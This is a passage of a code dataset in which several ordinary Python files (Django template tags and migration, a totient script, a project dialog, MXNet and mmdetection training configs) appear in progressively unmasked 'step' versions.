"step-2": "<mask token>\n\n\n@register.filter\ndef jsonify(object):\n return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))\n\n\n@register.simple_tag\ndef get_crop_url(crop, width=None, scale=1):\n if width:\n return crop.url_at_width(width * scale)\n else:\n return crop.url_at_width(crop.width * scale)\n\n\n@register.assignment_tag\ndef get_available_crop_scales(crop, width):\n return crop.available_scales(width=width)\n",
"step-3": "<mask token>\nregister = template.Library()\n\n\n@register.filter\ndef jsonify(object):\n return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))\n\n\n@register.simple_tag\ndef get_crop_url(crop, width=None, scale=1):\n if width:\n return crop.url_at_width(width * scale)\n else:\n return crop.url_at_width(crop.width * scale)\n\n\n@register.assignment_tag\ndef get_available_crop_scales(crop, width):\n return crop.available_scales(width=width)\n",
"step-4": "import json\nfrom django import template\nfrom django.core.serializers.json import DjangoJSONEncoder\nfrom django.utils.safestring import mark_safe\nregister = template.Library()\n\n\n@register.filter\ndef jsonify(object):\n return mark_safe(json.dumps(object, cls=DjangoJSONEncoder))\n\n\n@register.simple_tag\ndef get_crop_url(crop, width=None, scale=1):\n if width:\n return crop.url_at_width(width * scale)\n else:\n return crop.url_at_width(crop.width * scale)\n\n\n@register.assignment_tag\ndef get_available_crop_scales(crop, width):\n return crop.available_scales(width=width)\n",
"step-5": null,
"step-ids": [
0,
3,
4,
5
]
}
|
[
0,
3,
4,
5
] |
def phi(n):
r = n
d = 2
p = n
while r > 1:
if r % d == 0:
p -= int(r/d)
while r % d == 0:
r = int(r/d)
d += 1
return p
m = (0, 1)
for n in range(2, 1000000):
p = phi(n)
m = max(m, (n/p, n))
if n % 10000 == 0:
print(n)
print(m)
|
normal
|
{
"blob_id": "e4f97018567559fc2714b75654974fb7c51f770f",
"index": 5266,
"step-1": "<mask token>\n",
"step-2": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\n",
"step-3": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\n<mask token>\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-4": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r / d)\n while r % d == 0:\n r = int(r / d)\n d += 1\n return p\n\n\nm = 0, 1\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n / p, n))\n if n % 10000 == 0:\n print(n)\nprint(m)\n",
"step-5": "def phi(n):\n r = n\n d = 2\n p = n\n while r > 1:\n if r % d == 0:\n p -= int(r/d)\n while r % d == 0:\n r = int(r/d)\n d += 1\n return p\n\nm = (0, 1)\nfor n in range(2, 1000000):\n p = phi(n)\n m = max(m, (n/p, n))\n if n % 10000 == 0:\n print(n)\n\nprint(m)\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
# Generated by Django 3.1.2 on 2020-10-25 01:19
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('jobs', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='job',
name='link',
field=models.URLField(null=True),
),
migrations.AddField(
model_name='job',
name='title',
field=models.CharField(default=datetime.date(2020, 10, 25), max_length=200),
preserve_default=False,
),
]
|
normal
|
{
"blob_id": "562888201719456ed2f3c32e81ffd7d2c39dabc3",
"index": 7303,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Migration(migrations.Migration):\n <mask token>\n <mask token>\n",
"step-3": "<mask token>\n\n\nclass Migration(migrations.Migration):\n dependencies = [('jobs', '0001_initial')]\n operations = [migrations.AddField(model_name='job', name='link', field=\n models.URLField(null=True)), migrations.AddField(model_name='job',\n name='title', field=models.CharField(default=datetime.date(2020, 10,\n 25), max_length=200), preserve_default=False)]\n",
"step-4": "import datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n dependencies = [('jobs', '0001_initial')]\n operations = [migrations.AddField(model_name='job', name='link', field=\n models.URLField(null=True)), migrations.AddField(model_name='job',\n name='title', field=models.CharField(default=datetime.date(2020, 10,\n 25), max_length=200), preserve_default=False)]\n",
"step-5": "# Generated by Django 3.1.2 on 2020-10-25 01:19\n\nimport datetime\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('jobs', '0001_initial'),\n ]\n\n operations = [\n migrations.AddField(\n model_name='job',\n name='link',\n field=models.URLField(null=True),\n ),\n migrations.AddField(\n model_name='job',\n name='title',\n field=models.CharField(default=datetime.date(2020, 10, 25), max_length=200),\n preserve_default=False,\n ),\n ]\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
import boring.dialog
import boring.form
FORMSTRING = '''
Project name@string
Width@int|Height@int
Background color@color
Fullscreen@check
'''
class NewProjectWindow(boring.dialog.DefaultDialog):
def __init__(self, master, _dict=None):
self._dict = _dict
self.output = None
boring.dialog.DefaultDialog.__init__(self, master)
def body(self, master):
initial_values = [
'',
640, 480,
'#dadada',
False
]
if self._dict:
initial_values = [
self._dict.get('name'),
self._dict.get('width'), self._dict.get('height'),
self._dict.get('bgcolor'),
self._dict.get('fullscreen')
]
self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))
self.form.grid(pady=10, padx=10)
return self.form.inputs[0]
def apply(self):
'''
called when ok button is pressed
'''
self.output = {
'name': self.form.values[0],
'width': self.form.values[1],
'height': self.form.values[2],
'bgcolor': self.form.values[3],
'fullscreen': self.form.values[4]
}
def validate(self):
width = self.form.values[1]
height = self.form.values[2]
if width <= 0 or height <= 0:
boring.dialog.MessageBox.warning(parent=self,
title='Wrong data',
message='Invalid width/height')
return False
if not self.form.values[0]:
boring.dialog.MessageBox.warning(parent=self,
title='Project title',
message='Invalid project name')
return False
return True
|
normal
|
{
"blob_id": "76420ec1b37d4b9b85f35764a7f8a0e1f19a15dd",
"index": 5745,
"step-1": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n <mask token>\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-2": "<mask token>\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-3": "<mask token>\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-4": "import boring.dialog\nimport boring.form\nFORMSTRING = \"\"\"\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n\"\"\"\n\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = ['', 640, 480, '#dadada', False]\n if self._dict:\n initial_values = [self._dict.get('name'), self._dict.get(\n 'width'), self._dict.get('height'), self._dict.get(\n 'bgcolor'), self._dict.get('fullscreen')]\n self.form = boring.form.FormFrame(master, FORMSTRING,\n initial_values=initial_values, title='%s Project' % ('Edit' if\n self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n return self.form.inputs[0]\n\n def apply(self):\n \"\"\"\n called when ok button is pressed\n \"\"\"\n self.output = {'name': self.form.values[0], 'width': self.form.\n values[1], 'height': self.form.values[2], 'bgcolor': self.form.\n values[3], 'fullscreen': self.form.values[4]}\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Wrong data', message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self, title=\n 'Project title', message='Invalid project name')\n return False\n return True\n",
"step-5": "import boring.dialog\nimport boring.form\n\nFORMSTRING = '''\nProject name@string\nWidth@int|Height@int\nBackground color@color\nFullscreen@check\n'''\n\nclass NewProjectWindow(boring.dialog.DefaultDialog):\n def __init__(self, master, _dict=None):\n self._dict = _dict\n self.output = None\n boring.dialog.DefaultDialog.__init__(self, master)\n\n def body(self, master):\n initial_values = [\n '',\n 640, 480,\n '#dadada',\n False\n ]\n if self._dict:\n initial_values = [\n self._dict.get('name'),\n self._dict.get('width'), self._dict.get('height'),\n self._dict.get('bgcolor'),\n self._dict.get('fullscreen')\n ]\n self.form = boring.form.FormFrame(master, FORMSTRING, initial_values=initial_values, title='%s Project' % ('Edit' if self._dict else 'New'))\n self.form.grid(pady=10, padx=10)\n\n return self.form.inputs[0]\n\n def apply(self):\n '''\n called when ok button is pressed\n '''\n self.output = {\n 'name': self.form.values[0],\n 'width': self.form.values[1],\n 'height': self.form.values[2],\n 'bgcolor': self.form.values[3],\n 'fullscreen': self.form.values[4]\n }\n\n def validate(self):\n width = self.form.values[1]\n height = self.form.values[2]\n if width <= 0 or height <= 0:\n boring.dialog.MessageBox.warning(parent=self,\n title='Wrong data',\n message='Invalid width/height')\n return False\n if not self.form.values[0]:\n boring.dialog.MessageBox.warning(parent=self,\n title='Project title',\n message='Invalid project name')\n return False\n return True",
"step-ids": [
4,
5,
6,
7,
8
]
}
|
[
4,
5,
6,
7,
8
] |
import mxnet as mx
import numpy as np
import logging
# Example performance:
# INFO:root:Epoch[34] Train-accuracy=0.601388
# INFO:root:Epoch[34] Validation-accuracy=0.620949
logger = logging.getLogger()
logger.setLevel(logging.DEBUG)
# running device
dev = mx.gpu()
# batch size and input shape
batch_size = 64
data_shape = (3, 36, 36)
# training data info for learning rate reduction
num_examples = 20000
epoch_size = num_examples / batch_size
lr_factor_epoch = 15
# model saving parameter
model_prefix = "./models/sample_net"
# train data iterator
train = mx.io.ImageRecordIter(
path_imgrec = "tr.rec",
mean_r = 128,
mean_g = 128,
mean_b = 128,
scale = 0.0078125,
max_aspect_ratio = 0.35,
data_shape = data_shape,
batch_size = batch_size,
rand_crop = True,
rand_mirror = True)
# validate data iterator
val = mx.io.ImageRecordIter(
path_imgrec = "va.rec",
mean_r = 128,
mean_b = 128,
mean_g = 128,
scale = 0.0078125,
rand_crop = False,
rand_mirror = False,
data_shape = data_shape,
batch_size = batch_size)
# network definition
# stage 1
net = mx.sym.Variable("data")
net = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Pooling(data=net, pool_type="max", kernel=(3, 3), stride=(2, 2))
# stage 2
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Pooling(data=net, pool_type="max", kernel=(3, 3), stride=(2, 2))
# stage 3
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))
net = mx.sym.Activation(data=net, act_type="relu")
net = mx.sym.Pooling(data=net, pool_type="avg", kernel=(9, 9), stride=(1, 1))
# stage 4
net = mx.sym.Flatten(data=net)
net = mx.sym.Dropout(data=net, p=0.25)
net = mx.sym.FullyConnected(data=net, num_hidden=121)
net = mx.symbol.SoftmaxOutput(data=net, name='softmax')
# Model parameter
# This model will reduce learning rate by factor 0.1 for every 15 epoch
model = mx.model.FeedForward(
ctx = dev,
symbol = net,
num_epoch = 35,
learning_rate = 0.01,
momentum = 0.9,
wd = 0.0001,
clip_gradient = 5,
lr_scheduler = mx.lr_scheduler.FactorScheduler(step=epoch_size * lr_factor_epoch, factor = 0.1),
initializer = mx.init.Xavier(factor_type="in", magnitude=2.34))
# fit the model
model.fit(
X = train,
eval_data = val,
batch_end_callback = mx.callback.Speedometer(batch_size, 50),
epoch_end_callback = mx.callback.do_checkpoint(model_prefix))
|
normal
|
{
"blob_id": "e82b9aa0f7dc669b3d5622c093b766c7e168221c",
"index": 5757,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nlogger.setLevel(logging.DEBUG)\n<mask token>\nmodel.fit(X=train, eval_data=val, batch_end_callback=mx.callback.\n Speedometer(batch_size, 50), epoch_end_callback=mx.callback.\n do_checkpoint(model_prefix))\n",
"step-3": "<mask token>\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\ndev = mx.gpu()\nbatch_size = 64\ndata_shape = 3, 36, 36\nnum_examples = 20000\nepoch_size = num_examples / batch_size\nlr_factor_epoch = 15\nmodel_prefix = './models/sample_net'\ntrain = mx.io.ImageRecordIter(path_imgrec='tr.rec', mean_r=128, mean_g=128,\n mean_b=128, scale=0.0078125, max_aspect_ratio=0.35, data_shape=\n data_shape, batch_size=batch_size, rand_crop=True, rand_mirror=True)\nval = mx.io.ImageRecordIter(path_imgrec='va.rec', mean_r=128, mean_b=128,\n mean_g=128, scale=0.0078125, rand_crop=False, rand_mirror=False,\n data_shape=data_shape, batch_size=batch_size)\nnet = mx.sym.Variable('data')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='avg', kernel=(9, 9), stride=(1, 1))\nnet = mx.sym.Flatten(data=net)\nnet = mx.sym.Dropout(data=net, p=0.25)\nnet = mx.sym.FullyConnected(data=net, num_hidden=121)\nnet = mx.symbol.SoftmaxOutput(data=net, name='softmax')\nmodel = mx.model.FeedForward(ctx=dev, symbol=net, num_epoch=35,\n learning_rate=0.01, momentum=0.9, wd=0.0001, clip_gradient=5,\n lr_scheduler=mx.lr_scheduler.FactorScheduler(step=epoch_size *\n lr_factor_epoch, factor=0.1), initializer=mx.init.Xavier(factor_type=\n 'in', magnitude=2.34))\nmodel.fit(X=train, eval_data=val, batch_end_callback=mx.callback.\n Speedometer(batch_size, 50), epoch_end_callback=mx.callback.\n do_checkpoint(model_prefix))\n",
"step-4": "import mxnet as mx\nimport numpy as np\nimport logging\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\ndev = mx.gpu()\nbatch_size = 64\ndata_shape = 3, 36, 36\nnum_examples = 20000\nepoch_size = num_examples / batch_size\nlr_factor_epoch = 15\nmodel_prefix = './models/sample_net'\ntrain = mx.io.ImageRecordIter(path_imgrec='tr.rec', mean_r=128, mean_g=128,\n mean_b=128, scale=0.0078125, max_aspect_ratio=0.35, data_shape=\n data_shape, batch_size=batch_size, rand_crop=True, rand_mirror=True)\nval = mx.io.ImageRecordIter(path_imgrec='va.rec', mean_r=128, mean_b=128,\n mean_g=128, scale=0.0078125, rand_crop=False, rand_mirror=False,\n data_shape=data_shape, batch_size=batch_size)\nnet = mx.sym.Variable('data')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='max', kernel=(3, 3), stride=(2, 2))\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type='relu')\nnet = mx.sym.Pooling(data=net, pool_type='avg', kernel=(9, 9), stride=(1, 1))\nnet = mx.sym.Flatten(data=net)\nnet = mx.sym.Dropout(data=net, p=0.25)\nnet = mx.sym.FullyConnected(data=net, num_hidden=121)\nnet = mx.symbol.SoftmaxOutput(data=net, name='softmax')\nmodel = mx.model.FeedForward(ctx=dev, symbol=net, num_epoch=35,\n learning_rate=0.01, momentum=0.9, wd=0.0001, clip_gradient=5,\n lr_scheduler=mx.lr_scheduler.FactorScheduler(step=epoch_size *\n lr_factor_epoch, factor=0.1), initializer=mx.init.Xavier(factor_type=\n 'in', magnitude=2.34))\nmodel.fit(X=train, eval_data=val, batch_end_callback=mx.callback.\n Speedometer(batch_size, 50), epoch_end_callback=mx.callback.\n do_checkpoint(model_prefix))\n",
"step-5": "import mxnet as mx\nimport numpy as np\nimport logging\n\n# Example performance:\n# INFO:root:Epoch[34] Train-accuracy=0.601388\n# INFO:root:Epoch[34] Validation-accuracy=0.620949\n\nlogger = logging.getLogger()\nlogger.setLevel(logging.DEBUG)\n\n# running device\ndev = mx.gpu()\n# batch size and input shape\nbatch_size = 64\ndata_shape = (3, 36, 36)\n# training data info for learning rate reduction\nnum_examples = 20000\nepoch_size = num_examples / batch_size\nlr_factor_epoch = 15\n# model saving parameter\nmodel_prefix = \"./models/sample_net\"\n\n# train data iterator\ntrain = mx.io.ImageRecordIter(\n path_imgrec = \"tr.rec\",\n mean_r = 128,\n mean_g = 128,\n mean_b = 128,\n scale = 0.0078125,\n max_aspect_ratio = 0.35,\n data_shape = data_shape,\n batch_size = batch_size,\n rand_crop = True,\n rand_mirror = True)\n\n# validate data iterator\nval = mx.io.ImageRecordIter(\n path_imgrec = \"va.rec\",\n mean_r = 128,\n mean_b = 128,\n mean_g = 128,\n scale = 0.0078125,\n rand_crop = False,\n rand_mirror = False,\n data_shape = data_shape,\n batch_size = batch_size)\n\n# network definition\n# stage 1\nnet = mx.sym.Variable(\"data\")\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=32, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(5, 5), num_filter=64, pad=(2, 2))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Pooling(data=net, pool_type=\"max\", kernel=(3, 3), stride=(2, 2))\n# stage 2\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=64, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=128, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Pooling(data=net, pool_type=\"max\", kernel=(3, 3), stride=(2, 2))\n# stage 3\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Convolution(data=net, kernel=(3, 3), num_filter=256, pad=(1, 1))\nnet = mx.sym.Activation(data=net, act_type=\"relu\")\nnet = mx.sym.Pooling(data=net, pool_type=\"avg\", kernel=(9, 9), stride=(1, 1))\n# stage 4\nnet = mx.sym.Flatten(data=net)\nnet = mx.sym.Dropout(data=net, p=0.25)\nnet = mx.sym.FullyConnected(data=net, num_hidden=121)\nnet = mx.symbol.SoftmaxOutput(data=net, name='softmax')\n\n# Model parameter\n# This model will reduce learning rate by factor 0.1 for every 15 epoch\nmodel = mx.model.FeedForward(\n ctx = dev,\n symbol = net,\n num_epoch = 35,\n learning_rate = 0.01,\n momentum = 0.9,\n wd = 0.0001,\n clip_gradient = 5,\n lr_scheduler = mx.lr_scheduler.FactorScheduler(step=epoch_size * lr_factor_epoch, factor = 0.1),\n initializer = mx.init.Xavier(factor_type=\"in\", magnitude=2.34))\n\n# fit the model\nmodel.fit(\n X = train,\n eval_data = val,\n batch_end_callback = mx.callback.Speedometer(batch_size, 50),\n epoch_end_callback = mx.callback.do_checkpoint(model_prefix))\n\n",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
_base_ = [
'../models/cascade_rcnn_r50_fpn.py',
#'coco_instance.py',
'../datasets/dataset.py',
'../runtime/valid_search_wandb_runtime.py',
'../schedules/schedule_1x.py'
]
pretrained = 'https://github.com/SwinTransformer/storage/releases/download/v1.0.0/swin_tiny_patch4_window7_224.pth' # noqa
model = dict(
type='CascadeRCNN',
backbone=dict(
_delete_=True,
type='SwinTransformer',
embed_dims=96,
depths=[2, 2, 6, 2],
num_heads=[3, 6, 12, 24],
window_size=7,
mlp_ratio=4,
qkv_bias=True,
qk_scale=None,
drop_rate=0.,
attn_drop_rate=0.,
drop_path_rate=0.2,
patch_norm=True,
out_indices=(0, 1, 2, 3),
with_cp=False,
convert_weights=True,
init_cfg=dict(type='Pretrained', checkpoint=pretrained)),
neck=dict(in_channels=[96, 192, 384, 768])
#[256, 512, 1024, 2048]
)
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
# augmentation strategy originates from DETR / Sparse RCNN
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(
type='AutoAugment',
policies=[[
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),
(608, 1024), (640, 1024), (672, 1024), (704, 1024),
(736, 1024), (768, 1024), (800, 1024)],
multiscale_mode='value',
keep_ratio=True)
],
[
dict(
type='Resize',
img_scale=[(400, 1024), (500, 1024), (600, 1024)],
multiscale_mode='value',
keep_ratio=True),
dict(
type='RandomCrop',
crop_type='absolute_range',
crop_size=(384, 600),
allow_negative_crop=True),
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024),
(576, 1024), (608, 1024), (640, 1024),
(672, 1024), (704, 1024), (736, 1024),
(768, 1024), (800, 1024)],
multiscale_mode='value',
override=True,
keep_ratio=True)
]]),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
val_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(type='RandomFlip', flip_ratio=0.5),
dict(
type='AutoAugment',
policies=[[
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024), (576, 1024),
(608, 1024), (640, 1024), (672, 1024), (704, 1024),
(736, 1024), (768, 1024), (800, 1024)],
multiscale_mode='value',
keep_ratio=True)
],
[
dict(
type='Resize',
img_scale=[(400, 1024), (500, 1024), (600, 1024)],
multiscale_mode='value',
keep_ratio=True),
dict(
type='RandomCrop',
crop_type='absolute_range',
crop_size=(384, 600),
allow_negative_crop=True),
dict(
type='Resize',
img_scale=[(480, 1024), (512, 1024), (544, 1024),
(576, 1024), (608, 1024), (640, 1024),
(672, 1024), (704, 1024), (736, 1024),
(768, 1024), (800, 1024)],
multiscale_mode='value',
override=True,
keep_ratio=True)
]]),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size_divisor=32),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
data = dict(train=dict(pipeline=train_pipeline),val=dict(pipeline=val_pipeline))
evaluation = dict(interval=1, metric='bbox', save_best='bbox_mAP_50')
checkpoint_config = dict(interval=1)
# yapf:disable
log_config = dict(
interval=50,
hooks=[
dict(type='TextLoggerHook'),
# dict(
# type='WandbLoggerHook',
# init_kwargs=dict(
# project='valid_search',
# name='YOUR_EXP'
# ))
])
# yapf:enable
custom_hooks = [dict(type='NumClassCheckHook')]
dist_params = dict(backend='nccl')
log_level = 'INFO'
load_from = None
resume_from = None
workflow = [('train', 1)]
optimizer = dict(
_delete_=True,
type='AdamW',
lr=0.0001,
betas=(0.9, 0.999),
weight_decay=0.05,
paramwise_cfg=dict(
custom_keys={
'absolute_pos_embed': dict(decay_mult=0.),
'relative_position_bias_table': dict(decay_mult=0.),
'norm': dict(decay_mult=0.)
}))
lr_config = dict(warmup_iters=1000, step=[27, 33])
runner = dict(max_epochs=36)
|
normal
|
{
"blob_id": "2874e05d6d5e0f13924e5920db22ea3343707dfa",
"index": 3898,
"step-1": "<mask token>\n",
